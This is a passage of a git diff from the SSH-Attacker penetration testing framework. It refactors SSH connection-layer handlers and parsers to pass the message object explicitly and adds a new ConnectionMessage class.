a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java @@ -25,7 +25,7 @@ public ChannelRequestPtyMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestPtyMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java index 2ef5796e9..c9e4b64cf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java @@ -27,7 +27,7 @@ public ChannelRequestShellMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestShellMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java index b603a31a5..d8ad85ba2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java @@ -27,7 +27,7 @@ public ChannelRequestSignalMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestSignalMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java index 667911504..3f2edd5b4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java @@ -26,7 +26,7 @@ public ChannelRequestSubsystemMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestSubsystemMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java index d8349e5da..3f994da6b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java @@ -27,7 +27,7 @@ public ChannelRequestUnknownMessageHandler(SshContext context) { @Override public void adjustContext(ChannelRequestUnknownMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java index 0c6f073e8..be4ce8106 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java @@ -46,7 +46,7 @@ public ChannelRequestWindowChangeMessageSerializer getSerializer() { @Override public void adjustContext(ChannelRequestWindowChangeMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java index 5064a8f2e..46f27dce7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java @@ -44,7 +44,7 @@ public ChannelRequestX11MessageSerializer getSerializer() { @Override public void adjustContext(ChannelRequestX11Message message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java index c200e169b..07bf0a853 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java @@ -47,7 +47,7 @@ public ChannelRequestXonXoffMessageSerializer getSerializer() { @Override public void adjustContext(ChannelRequestXonXoffMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { - context.getChannelManager().addToChannelRequestResponseQueue(message); + sshContext.getChannelManager().addToChannelRequestResponseQueue(message); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java index ae7f68966..f9e9e9ead 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java @@ -26,7 +26,7 @@ public ChannelWindowAdjustMessageHandler(SshContext context) { @Override public void adjustContext(ChannelWindowAdjustMessage message) { - Channel channel = context.getChannels().get(message.getRecipientChannelId().getValue()); + Channel channel = sshContext.getChannels().get(message.getRecipientChannelId().getValue()); if (channel != null) { if (!channel.isOpen().getValue()) { LOGGER.warn( @@ -41,8 +41,8 @@ public void adjustContext(ChannelWindowAdjustMessage message) { "{} received but no channel with id {} found locally, creating a new channel from defaults with given channel id.", this.getClass().getSimpleName(), message.getRecipientChannelId().getValue()); - channel = context.getConfig().getChannelDefaults().newChannelFromDefaults(); - context.getChannels().put(channel.getLocalChannelId().getValue(), channel); + channel = sshContext.getConfig().getChannelDefaults().newChannelFromDefaults(); + sshContext.getChannels().put(channel.getLocalChannelId().getValue(), channel); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java new file mode 100644 index 000000000..063de2e75 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ConnectionMessage.java @@ -0,0 +1,129 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.connection.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableProperty; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; +import de.rub.nds.sshattacker.core.constants.ProtocolMessageType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.authentication.handler.ConnectionMessageHandler; +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ConnectionMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ConnectionMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ConnectionMessageSerializer; +import jakarta.xml.bind.annotation.adapters.XmlJavaTypeAdapter; +import java.io.InputStream; +import java.util.Arrays; + +public class ConnectionMessage extends ProtocolMessage { + @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) + private byte[] dataConfig = null; + + @ModifiableVariableProperty private ModifiableByteArray data; + + public ConnectionMessage(byte[] dataConfig) { + super(); + this.dataConfig = dataConfig; + this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; + } + + public ConnectionMessage() { + super(); + this.protocolMessageType = ProtocolMessageType.AUTHENTICATION; + } + + public ModifiableByteArray getData() { + return data; + } + + public void setData(ModifiableByteArray data) { + this.data = data; + } + + public void setData(byte[] data) { + if (this.data == null) { + this.data = new ModifiableByteArray(); + } + this.data.setOriginalValue(data); + } + + public byte[] getDataConfig() { + return dataConfig; + } + + public void setDataConfig(byte[] dataConfig) { + this.dataConfig = dataConfig; + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(); + sb.append("ApplicationMessage:"); + sb.append("\n Data: "); + if (data != null && data.getValue() != null) { + sb.append(ArrayConverter.bytesToHexString(data.getValue())); + } else { + sb.append("null"); + } + return sb.toString(); + } + + @Override + public String toCompactString() { + return "APPLICATION"; + } + + @Override + public String toShortString() { + return "APP"; + } + + @Override + public ConnectionMessageHandler getHandler(SshContext sshContext) { + return new ConnectionMessageHandler(sshContext); + } + + @Override + public ConnectionMessageParser getParser(SshContext sshContext, InputStream stream) { + return new ConnectionMessageParser(stream); + } + + @Override + public ConnectionMessagePreparator getPreparator(SshContext sshContext) { + return new ConnectionMessagePreparator(sshContext.getChooser(), this); + } + + @Override + public ConnectionMessageSerializer getSerializer(SshContext sshContext) { + return new ConnectionMessageSerializer(this); + } + + @Override + public int hashCode() { + int hash = 7; + hash = 43 * hash + Arrays.hashCode(this.dataConfig); + return hash; + } + + @Override + public boolean equals(Object obj) { + if (this == obj) { + return true; + } + if (obj == null) { + return false; + } + if (getClass() != obj.getClass()) { + return false; + } + final ConnectionMessage other = (ConnectionMessage) obj; + return Arrays.equals(this.dataConfig, other.dataConfig); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java index 176dbf0ff..4bd76e6d1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelCloseMessageParser.java @@ -27,11 +27,11 @@ public ChannelCloseMessageParser(InputStream stream) { @Override public void parse(ChannelCloseMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelCloseMessage createMessage() { return new ChannelCloseMessage(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java index f23fb44ea..d170f85ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelDataMessageParser.java @@ -33,15 +33,17 @@ public ChannelDataMessageParser(InputStream stream) { @Override public void parse(ChannelDataMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelDataMessage createMessage() { - return new ChannelDataMessage(); - } + /* + @Override + public ChannelDataMessage createMessage() { + return new ChannelDataMessage(); + } + */ - private void parseData() { + private void parseData(ChannelDataMessage message) { message.setDataLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Data length: " + message.getDataLength().getValue()); message.setData(parseByteArrayField(message.getDataLength().getValue())); @@ -49,8 +51,8 @@ private void parseData() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseData(); + protected void parseMessageSpecificContents(ChannelDataMessage message) { + super.parseMessageSpecificContents(message); + parseData(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java index 8eaf78d04..c525bdd30 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelEofMessageParser.java @@ -27,11 +27,11 @@ public ChannelEofMessageParser(InputStream stream) { @Override public void parse(ChannelEofMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelEofMessage createMessage() { return new ChannelEofMessage(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java index b2380dade..a5dc823bf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelExtendedDataMessageParser.java @@ -34,17 +34,19 @@ public ChannelExtendedDataMessageParser(InputStream stream) { @Override public void parse(ChannelExtendedDataMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } private static final Logger LOGGER = LogManager.getLogger(); - @Override - public ChannelExtendedDataMessage createMessage() { - return new ChannelExtendedDataMessage(); - } + /* + @Override + public ChannelExtendedDataMessage createMessage() { + return new ChannelExtendedDataMessage(); + } + */ - private void parseDataTypeCode() { + private void parseDataTypeCode(ChannelExtendedDataMessage message) { message.setDataTypeCode(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Data type code: " + message.getDataTypeCode().getValue()); LOGGER.debug( @@ -53,7 +55,7 @@ private void parseDataTypeCode() { message.getDataTypeCode().getValue())); } - private void parseData() { + private void parseData(ChannelExtendedDataMessage message) { message.setDataLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Data length: " + message.getDataLength().getValue()); message.setData(parseByteArrayField(message.getDataLength().getValue())); @@ -61,9 +63,9 @@ private void parseData() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseDataTypeCode(); - parseData(); + protected void parseMessageSpecificContents(ChannelExtendedDataMessage message) { + super.parseMessageSpecificContents(message); + parseDataTypeCode(message); + parseData(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java index 9ff1d4583..8163ae33c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelFailureMessageParser.java @@ -27,11 +27,11 @@ public ChannelFailureMessageParser(InputStream stream) { @Override public void parse(ChannelFailureMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelFailureMessage createMessage() { return new ChannelFailureMessage(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java index 6b0849ff3..39bd0f43e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelMessageParser.java @@ -30,13 +30,13 @@ public ChannelMessageParser(InputStream stream) { super(stream); } - private void parseRecipientChannel() { + private void parseRecipientChannel(T message) { message.setRecipientChannelId(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Recipient channel id: " + message.getRecipientChannelId().getValue()); } @Override - protected void parseMessageSpecificContents() { - parseRecipientChannel(); + protected void parseMessageSpecificContents(T message) { + parseRecipientChannel(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java index a0b6eb4fa..0dcc17381 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenConfirmationMessageParser.java @@ -28,38 +28,38 @@ public ChannelOpenConfirmationMessageParser(byte[] array, int startPosition) { @Override public void parse(ChannelOpenConfirmationMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } public ChannelOpenConfirmationMessageParser(InputStream stream) { super(stream); } - @Override - public ChannelOpenConfirmationMessage createMessage() { - return new ChannelOpenConfirmationMessage(); - } - - private void parseSenderChannel() { + /* @Override + public ChannelOpenConfirmationMessage createMessage() { + return new ChannelOpenConfirmationMessage(); + } + */ + private void parseSenderChannel(ChannelOpenConfirmationMessage message) { message.setSenderChannelId(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Sender channel id: " + message.getSenderChannelId().getValue()); } - private void parseWindowSize() { + private void parseWindowSize(ChannelOpenConfirmationMessage message) { message.setWindowSize(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Initial window size: " + message.getWindowSize().getValue()); } - private void parsePacketSize() { + private void parsePacketSize(ChannelOpenConfirmationMessage message) { message.setPacketSize(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Maximum packet size: " + message.getPacketSize().getValue()); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseSenderChannel(); - parseWindowSize(); - parsePacketSize(); + protected void parseMessageSpecificContents(ChannelOpenConfirmationMessage message) { + super.parseMessageSpecificContents(message); + parseSenderChannel(message); + parseWindowSize(message); + parsePacketSize(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java index fe81771a3..bb5204c29 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenFailureMessageParser.java @@ -34,20 +34,22 @@ public ChannelOpenFailureMessageParser(InputStream stream) { @Override public void parse(ChannelOpenFailureMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelOpenFailureMessage createMessage() { - return new ChannelOpenFailureMessage(); - } + /* + @Override + public ChannelOpenFailureMessage createMessage() { + return new ChannelOpenFailureMessage(); + } + */ - private void parseReasonCode() { + private void parseReasonCode(ChannelOpenFailureMessage message) { message.setReasonCode(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Reason code: " + message.getReasonCode()); } - private void parseReason() { + private void parseReason(ChannelOpenFailureMessage message) { message.setReasonLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Reason length: " + message.getReasonLength()); message.setReason( @@ -55,7 +57,7 @@ private void parseReason() { LOGGER.debug("Reason: {}", backslashEscapeString(message.getReason().getValue())); } - private void parseLanguageTag() { + private void parseLanguageTag(ChannelOpenFailureMessage message) { message.setLanguageTagLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Language tag length: " + message.getLanguageTagLength().getValue()); message.setLanguageTag( @@ -66,10 +68,10 @@ private void parseLanguageTag() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseReasonCode(); - parseReason(); - parseLanguageTag(); + protected void parseMessageSpecificContents(ChannelOpenFailureMessage message) { + super.parseMessageSpecificContents(message); + parseReasonCode(message); + parseReason(message); + parseLanguageTag(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java index d8f78e4bf..db5d8a9f9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenMessageParser.java @@ -32,7 +32,7 @@ public ChannelOpenMessageParser(InputStream stream) { super(stream); } - public void parseChannelType() { + public void parseChannelType(T message) { message.setChannelTypeLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Channel type length: " + message.getChannelTypeLength().getValue()); message.setChannelType( @@ -41,26 +41,26 @@ public void parseChannelType() { LOGGER.debug("Channel type: " + backslashEscapeString(message.getChannelType().getValue())); } - public void parseSenderChannel() { + public void parseSenderChannel(T message) { message.setSenderChannelId(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Sender channel id: " + message.getSenderChannelId().getValue()); } - public void parseWindowSize() { + public void parseWindowSize(T message) { message.setWindowSize(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Initial window size: " + message.getWindowSize().getValue()); } - public void parsePacketSize() { + public void parsePacketSize(T message) { message.setPacketSize(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Maximum packet size: " + message.getPacketSize().getValue()); } @Override - protected void parseMessageSpecificContents() { - parseChannelType(); - parseSenderChannel(); - parseWindowSize(); - parsePacketSize(); + protected void parseMessageSpecificContents(T message) { + parseChannelType(message); + parseSenderChannel(message); + parseWindowSize(message); + parsePacketSize(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java index 13c06a003..178f406ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenSessionMessageParser.java @@ -27,11 +27,11 @@ public ChannelOpenSessionMessageParser(InputStream stream) { @Override public void parse(ChannelOpenSessionMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelOpenSessionMessage createMessage() { return new ChannelOpenSessionMessage(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java index dca141cfd..0971c979d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelOpenUnknownMessageParser.java @@ -33,15 +33,15 @@ public ChannelOpenUnknownMessageParser(InputStream stream) { @Override public void parse(ChannelOpenUnknownMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelOpenUnknownMessage createMessage() { return new ChannelOpenUnknownMessage(); - } + }*/ - public void parseTypeSpecificData() { + public void parseTypeSpecificData(ChannelOpenUnknownMessage message) { message.setTypeSpecificData(parseByteArrayField(getBytesLeft())); LOGGER.debug( "Type specific data: " @@ -50,8 +50,8 @@ public void parseTypeSpecificData() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseTypeSpecificData(); + protected void parseMessageSpecificContents(ChannelOpenUnknownMessage message) { + super.parseMessageSpecificContents(message); + parseTypeSpecificData(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java index ad5aa7339..289a43dff 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestAuthAgentMessageParser.java @@ -28,11 +28,11 @@ public ChannelRequestAuthAgentMessageParser(InputStream stream) { @Override public void parse(ChannelRequestAuthAgentMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public ChannelRequestAuthAgentMessage createMessage() { return new ChannelRequestAuthAgentMessage(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java index 0022722fe..5d63a90b6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestBreakMessageParser.java @@ -32,22 +32,22 @@ public ChannelRequestBreakMessageParser(InputStream stream) { @Override public void parse(ChannelRequestBreakMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestBreakMessage createMessage() { - return new ChannelRequestBreakMessage(); - } - - public void parseBreakLength() { + /* @Override + public ChannelRequestBreakMessage createMessage() { + return new ChannelRequestBreakMessage(); + } + */ + public void parseBreakLength(ChannelRequestBreakMessage message) { message.setBreakLength(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Break length in milliseconds: " + message.getBreakLength().getValue()); } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseBreakLength(); + protected void parseMessageSpecificContents(ChannelRequestBreakMessage message) { + super.parseMessageSpecificContents(message); + parseBreakLength(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java index 65205fd40..88e839770 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestEnvMessageParser.java @@ -35,15 +35,17 @@ public ChannelRequestEnvMessageParser(InputStream stream) { @Override public void parse(ChannelRequestEnvMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public ChannelRequestEnvMessage createMessage() { - return new ChannelRequestEnvMessage(); - } + /* + @Override + public ChannelRequestEnvMessage createMessage() { + return new ChannelRequestEnvMessage(); + } + */ - public void parseVariableName() { + public void parseVariableName(ChannelRequestEnvMessage message) { message.setVariableNameLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Variable name length: " + message.getVariableNameLength().getValue()); message.setVariableName(parseByteString(message.getVariableNameLength().getValue())); @@ -51,7 +53,7 @@ public void parseVariableName() { "Variable name: {}", backslashEscapeString(message.getVariableName().getValue())); } - public void parseVariableValue() { + public void parseVariableValue(ChannelRequestEnvMessage message) { message.setVariableValueLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Variable value length: " + message.getVariableValueLength().getValue()); message.setVariableValue(parseByteString(message.getVariableValueLength().getValue())); @@ -60,9 +62,9 @@ public void parseVariableValue() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseVariableName(); - parseVariableValue(); + protected void parseMessageSpecificContents(ChannelRequestEnvMessage message) { + super.parseMessageSpecificContents(message); + parseVariableName(message); + parseVariableValue(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/ChannelRequestExecMessageParser.java 